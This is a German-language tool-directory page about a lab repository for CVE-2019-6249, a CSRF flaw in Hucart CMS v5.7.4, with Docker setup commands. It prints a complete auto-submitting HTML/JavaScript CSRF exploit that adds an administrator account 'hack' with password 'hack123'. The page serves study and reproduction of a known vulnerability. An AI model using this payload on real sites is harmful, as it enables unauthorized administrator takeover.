Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/alphabugx/cve-2019-6249_hucart-cms
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubalphabugx/cve-2019-6249_hucart-cms

CVE-2019-6249_Hucart-cms

CVE-2019-6249 Hucart cms Reproduktionsumgebung

Repository anzeigen
12vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-6249_Hucart cms

1. Zusammenfassung der Schwachstelle

Schwachstellenname: Hucart cms v5.7.4 CSRF-Schwachstelle, die beliebig Administrator-Konten hinzufügen kann
Meldedatum: 2019-01-13
Entdecker der Schwachstelle: AllenChen([email protected])
Produktseite: http://www.hucart.com/
Software-Link: http://www.hucart.com/
Version: v5.7.4
CVE-ID: CVE-2019-6249\

2. Schwachstellenübersicht

Hucart cms v5.7.4 weist eine CSRF-Schwachstelle auf. Wenn ein Administrator nach der Anmeldung die folgende CSRF-Testseite besucht, kann ein Administrator-Konto mit dem Namen 'hack' hinzugefügt werden.

3. Exploit-Code

Der Exploit-Code lautet wie folgt: Fügt ein Administrator-Konto mit dem Namen 'hack' und dem Passwort 'hack123' hinzu.

root@kitploit:~
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='adm_user' value='hack' />";
fields += "<input type='hidden' name='adm_email' value='[email protected]' />";  
fields += "<input type='hidden' name='adm_mobile' value='13888888888' />";  
fields += "<input type='hidden' name='adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='re_adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='adm_enabled' value='1' />";  
fields += "<input type='hidden' name='act_type' value='add' />";  
fields += "<input type='hidden' name='adm_id' value='' />";  

var url = "http://localhost/hucart_cn/adminsys/index.php?load=admins&act=edit_info&act_type=add";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

4. Referenzen

  • CVE Chinesische Antragsseite: http://www.iwantacve.cn/index.php/archives/109/
  • CVE Offizielle Seite: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6249
  • exploit-db: https://www.exploit-db.com/exploits/46149

5. Reproduktion der Umgebung (Docker)

In der Docker-Umgebung führen Sie die folgenden Befehle aus

root@kitploit:~
docker built -t hucart -f Dockerfile .
docker run -d -p 80:80 hucart

Original E-Mail: [email protected]

Tool herunterladen